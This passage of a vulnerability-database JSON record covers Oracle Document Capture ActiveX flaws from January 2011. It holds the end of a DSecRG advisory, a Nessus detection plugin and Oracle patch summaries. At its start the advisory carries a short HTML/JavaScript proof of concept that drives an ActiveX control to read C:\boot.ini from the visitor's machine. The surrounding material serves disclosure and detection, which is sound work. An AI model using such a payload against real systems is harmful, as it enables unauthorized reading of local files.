\r\n <OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>\r\n\r\n <SCRIPT>\r\n \r\n function Exploit(){\r\n ora.ImportBodyText(\"C:\\\\boot.ini\"); \r\n document.write(\"Try to read c:\\\\boot.ini:<br><br>\"+ora.BodyText);\r\n }\r\n Exploit();\r\n\r\n </SCRIPT>\r\n</BODY>\r\n</HTML>\r\n\r\n\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=307\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\n\r\n\r\nFix Information\r\n*************\r\n\r\nInformation was published in CPU Jan 2011.\r\nAll customers can download CPU patches following instructions from: \r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security: \r\n\r\nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\r\n\r\nDigital Security Research Group:\r\n\r\nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product \"ERPSCAN security suite for SAP NetWeaver\" and service \"ERPSCAN Online\" which can help customers to perform automated security assessments and compliance checks for SAP solutions.\r\n\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\nhttp://www.erpscan.com\r\n\r\n\r\n\r\n\r\n\r\n\r\nPolyakov Alexandr. PCI QSA,PA-QSA\r\nCTO Digital Security\r\nHead of DSecRG\r\n______________________\r\nDIGITAL SECURITY\r\nphone: +7 812 703 1547\r\n +7 812 430 9130\r\ne-mail: a.polyakov@dsec.ru \r\n\r\nwww.dsec.ru\r\nwww.dsecrg.com www.dsecrg.ru\r\nwww.erpscan.com www.erpscan.ru\r\nwww.pcidssru.com www.pcidss.ru\r\n\r\n\r\n-----------------------------------\r\nThis message and any attachment are confidential and may be privileged or otherwise protected \r\nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \r\nis strictly prohibited. If you have received this message in error, please notify the sender immediately \r\neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \r\nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \r\nstatements by e-mail unless otherwise agreed. \r\n-----------------------------------", "sourceHref": "https://www.exploit-db.com/download/16056", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "nessus": [{"lastseen": "2022-04-12T16:12:29", "description": "The Oracle Document Capture client installed on the remote host is potentially affected by multiple vulnerabilities :\n\n - An unspecified vulnerability exists in the Import Export utility. An attacker can exploit this to affect integrity. (CVE-2010-3598)\n\n - An information disclosure vulnerability exists related to the EasyMail ActiveX control (emsmtp.dll).\n (CVE-2010-3595)\n\n - Insecure methods in the 'Actbar2.ocx' and 'empop3.dll' ActiveX controls can be exploited to overwrite arbitrary files. (CVE-2010-3591)\n\n - An error in the 'WriteJPG()' method in the NCSEcw.dll ActiveX control can be exploited to overwrite arbitrary files or potentially cause a buffer overflow. (CVE-2010-3599)\n\n - An unspecified vulnerability exists in the Internal Operations component. (CVE-2010-3592)\n\nNote that the NCSEcw.dll control is actually from the ERDAS ECW/JP2 SDK developer toolkit from Intergraph. Note also that Nessus has not tested for this issue but has instead relied only on the presence of the affected ActiveX components.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2011-02-04T00:00:00", "type": "nessus", "title": "Oracle Document Capture Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3591", "CVE-2010-3592", "CVE-2010-3595", "CVE-2010-3598", "CVE-2010-3599"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_DOCUMENT_CAPTURE_ACTIVEX.NASL", "href": "https://www.tenable.com/plugins/nessus/51873", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51873);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2010-3591\",\n \"CVE-2010-3592\",\n \"CVE-2010-3595\",\n \"CVE-2010-3598\",\n \"CVE-2010-3599\"\n );\n script_bugtraq_id(\n 45846,\n 45849,\n 45851,\n 45856,\n 45871\n );\n script_xref(name:\"EDB-ID\", value:\"16052\");\n script_xref(name:\"EDB-ID\", value:\"16053\");\n script_xref(name:\"EDB-ID\", value:\"16055\");\n script_xref(name:\"EDB-ID\", value:\"16056\");\n script_xref(name:\"SECUNIA\", value:\"42976\");\n\n script_name(english:\"Oracle Document Capture Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has one or more ActiveX controls installed that are affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Oracle Document Capture client installed on the remote host is potentially affected by multiple vulnerabilities :\n\n - An unspecified vulnerability exists in the Import Export utility. An attacker can exploit this to affect\n integrity. (CVE-2010-3598)\n\n - An information disclosure vulnerability exists related to the EasyMail ActiveX control (emsmtp.dll).\n (CVE-2010-3595)\n\n - Insecure methods in the 'Actbar2.ocx' and 'empop3.dll' ActiveX controls can be exploited to overwrite\n arbitrary files. (CVE-2010-3591)\n\n - An error in the 'WriteJPG()' method in the NCSEcw.dll ActiveX control can be exploited to overwrite\n arbitrary files or potentially cause a buffer overflow. (CVE-2010-3599)\n\n - An unspecified vulnerability exists in the Internal Operations component. (CVE-2010-3592)\n\nNote that the NCSEcw.dll control is actually from the ERDAS ECW/JP2 SDK developer toolkit from Intergraph. Note also that\nNessus has not tested for this issue but has instead relied only on the presence of the affected ActiveX components.\");\n # https://web.archive.org/web/20110831133022/http://dsecrg.ru/pages/vul/show.php?id=306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a54d748d\");\n # https://web.archive.org/web/20110919025431/http://dsecrg.ru/pages/vul/show.php?id=307\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c14789b4\");\n # http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html%22\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?32532e3d\");\n # https://geospatialcommunity.hexagon.com/s/article/Security-Advisory-for-ERDAS-ECW-JP2-SDK\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0180a060\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using Oracle's Document Capture client, apply the patch from Oracle to disable the ActiveX controls.\n\nIf using a different application that includes the NCSEcw.dll control, set the kill bit for the affect control as\ndiscussed in Hexagon Geospatial's advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-3599\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nif (activex_init() != ACX_OK) exit(1, \"activex_init() failed.\");\n\nvar clsids = make_list(\n '{4932CEF4-2CAA-11D2-A165-0060081C43D9}',\n '{F647CBE5-3C01-402A-B3F0-502A77054A24}',\n '{10696DE0-CF47-4ad4-B1AE-CC1F4021D65B}',\n '{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}',\n '{DAFA4BF6-C807-463c-8745-C9E0C90CF84F}',\n '{D63891F1-E026-11D3-A6C3-005004055C6C}'\n);\n\n# Determine if any of the controls are installed.\nvar info = '';\nvar installs = 0;\n\nvar clsid, file, version, s;\n\nforeach clsid (clsids)\n{\n file = activex_get_filename(clsid:clsid);\n if (isnull(file))\n {\n activex_end();\n exit(1, \"activex_get_filename() returned NULL.\");\n }\n if (!file) continue;\n\n installs++;\n\n # Get its version\n version = activex_get_fileversion(clsid:clsid);\n if (!version) version = 'unknown';\n\n if (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0)\n {\n info += '\\n Class Identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version + '\\n';\n\n if (!thorough_tests) break;\n }\n}\nactivex_end();\n\n# Report findings.\nif (installs)\n{\n if (info)\n {\n if (report_paranoia > 1)\n {\n if (installs == 1) s = \" was\";\n else s = \"s were\";\n\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit' + s + '\\n' +\n 'set for the control\\'s CLSID because of the Report Paranoia setting' + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n if (installs == 1) s = \"its kill bit is not set so it is\";\n else s = \"their kill bits are not set so they are\";\n\n report = info +\n '\\n' +\n 'Moreover, ' + s + ' accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n exit(0);\n }\n else\n {\n if (installs == 1) exit(0, \"The control is installed but its kill bit is set.\");\n else exit(0, installs+\" instances of the controls are installed but their kill bits are set.\");\n }\n}\nelse exit(0, \"None of the affected controls are installed.\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:C"}}], "securityvulns": [{"lastseen": "2021-06-08T18:46:13", "description": "Quarterly security update closes nearly 70 different vulnerabilities in all applications.", "edition": 2, "cvss3": {}, "published": "2011-02-26T00:00:00", "title": "Oracle / Sun / Peoplesoft / Open Office applications multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3598", "CVE-2010-4428", "CVE-2010-4459", "CVE-2010-4445", "CVE-2010-4416", "CVE-2010-4429", "CVE-2010-3505", "CVE-2010-4420", "CVE-2010-4458", "CVE-2010-2632", "CVE-2010-1227", "CVE-2010-4439", "CVE-2010-4444", "CVE-2010-3599", "CVE-2010-3594", "CVE-2010-4425", "CVE-2010-3589", "CVE-2010-4433", "CVE-2010-3593", "CVE-2010-4426", "CVE-2010-4453", "CVE-2010-4436", "CVE-2010-2935", "CVE-2010-3597", "CVE-2010-4427", "CVE-2010-3592", "CVE-2010-4423", "CVE-2010-3574", "CVE-2010-4441", "CVE-2010-4461", "CVE-2010-4419", "CVE-2010-4435", "CVE-2010-3600", "CVE-2010-4431", "CVE-2010-4455", "CVE-2009-4269", "CVE-2009-3555", "CVE-2010-4457", "CVE-2010-4417", "CVE-2010-3590", "CVE-2010-4442", "CVE-2010-4464", "CVE-2010-4456", "CVE-2010-4443", "CVE-2010-4414", "CVE-2010-3595", "CVE-2010-4413", "CVE-2010-4415", "CVE-2010-4418", "CVE-2010-4434", "CVE-2010-4421", "CVE-2010-2936", "CVE-2010-4430", "CVE-2010-4437", "CVE-2010-3588", "CVE-2010-3510", "CVE-2010-4424", "CVE-2010-4449", "CVE-2010-3586", "CVE-2010-3591", "CVE-2010-4446", "CVE-2010-4432", "CVE-2010-3587", "CVE-2010-4460", "CVE-2010-4438", "CVE-2010-4440"], "modified": "2011-02-26T00:00:00", "id": "SECURITYVULNS:VULN:11380", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11380", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2021-06-08T18:46:13", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 66 new security fixes across all product families listed below.\n", "edition": 2, "cvss3": {}, "published": "2011-01-18T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - January 2011", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3598", "CVE-2010-3562", "CVE-2010-4428", "CVE-2010-4459", "CVE-2010-4445", "CVE-2010-4416", "CVE-2010-3557", "CVE-2010-4429", "CVE-2010-3505", "CVE-2010-4420", "CVE-2010-3551", "CVE-2010-4458", "CVE-2010-3553", "CVE-2010-2632", "CVE-2010-1227", "CVE-2010-3566", "CVE-2010-4439", "CVE-2010-4444", "CVE-2010-3565", "CVE-2010-3599", "CVE-2010-3594", "CVE-2010-4425", "CVE-2010-3589", "CVE-2010-3572", "CVE-2010-4433", "CVE-2010-3593", "CVE-2010-4426", "CVE-2010-4453", "CVE-2010-4436", "CVE-2010-2935", "CVE-2010-3597", "CVE-2010-4427", "CVE-2010-3592", "CVE-2010-4423", "CVE-2010-3574", "CVE-2010-4441", "CVE-2010-4461", "CVE-2010-4419", "CVE-2010-4435", "CVE-2010-3600", "CVE-2010-3541", "CVE-2010-4431", "CVE-2010-4455", "CVE-2009-4269", "CVE-2010-3571", "CVE-2009-3555", "CVE-2010-4457", "CVE-2010-4417", "CVE-2010-3590", "CVE-2010-4442", "CVE-2010-4464", "CVE-2010-3559", "CVE-2010-1321", "CVE-2010-4456", "CVE-2010-3556", "CVE-2010-4443", "CVE-2010-4414", "CVE-2010-3561", "CVE-2010-3595", "CVE-2010-3549", "CVE-2010-4413", "CVE-2010-3554", "CVE-2010-4415", "CVE-2010-4418", "CVE-2010-4434", "CVE-2010-4421", "CVE-2010-2936", "CVE-2010-3555", "CVE-2010-4430", "CVE-2010-4437", "CVE-2010-3588", "CVE-2010-3510", "CVE-2010-4424", "CVE-2010-4449", "CVE-2010-3567", "CVE-2010-3573", "CVE-2010-3586", "CVE-2010-3591", "CVE-2010-3548", "CVE-2010-4446", "CVE-2010-4432", "CVE-2010-3568", "CVE-2010-3587", "CVE-2010-4460", "CVE-2010-4438", "CVE-2010-4440", "CVE-2010-3569"], "modified": "2011-02-01T00:00:00", "id": "ORACLE:CPUJAN2011-194091", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}